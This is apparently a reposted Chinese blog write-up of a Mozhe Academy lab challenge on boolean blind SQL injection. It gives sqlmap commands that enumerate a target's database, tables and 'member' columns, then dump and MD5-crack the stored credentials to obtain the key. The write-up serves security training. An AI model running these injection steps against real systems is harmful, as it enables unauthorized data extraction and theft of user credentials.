墨者学院——SQL注入漏洞测试(布尔盲注)
发布日期:2021-06-30 17:41:04 浏览次数:2 分类:技术文章

本文共 605 字,大约阅读时间需要 2 分钟。

题目: 背景介绍

一位热心的网友再次向“墨者”安全工程师挑战,“墨者”工程师在注入时发现网页无回显,“墨者”工程师想了一会就注入完成拿到了key。

所以从这里的URL入手,存在注入点

在这里插入图片描述

利用sqlmap注入:

  1. sqlmap.py -u url --current-db 获取到的数据库名是stormgroup
sqlmap.py -u http://219.153.49.228:42218/new_list.php?id=1 --current-db

在这里插入图片描述

  1. sqlmap.py -u url -D 获取到的数据名 --tables 获取到的表是member和notice
sqlmap.py -u http://219.153.49.228:42218/new_list.php?id=1 -D stormgroup --table

在这里插入图片描述

  1. sqlmap.py -u url -D 获取到的数据库名 -T 获取到的表名 --columns 获取到的列名分别是 name password status
sqlmap.py -u http://219.153.49.228:42218/new_list.php?id=1 -D stormgroup -T member --columns

在这里插入图片描述

  1. 接下来就不断按回车,最后出现name和password,有两个所以要分别尝试(password需要通过MD5解码才行):
    在这里插入图片描述

在这里插入图片描述

提交得到KEY

在这里插入图片描述

转载地址:https://leo-max.blog.csdn.net/article/details/104235489 如侵犯您的版权,请留言回复原文章的地址,我们会给您删除此文章,给您带来不便请您谅解!

上一篇:墨者学院——phpMyAdmin后台文件包含分析溯源
下一篇:墨者学院 ——X-Forwarded-For注入漏洞实战

发表评论

最新留言

关注你微信了!
[***.104.42.241]2024年04月16日 13时33分16秒

关于作者

    喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!
-- 愿君每日到此一游!

推荐文章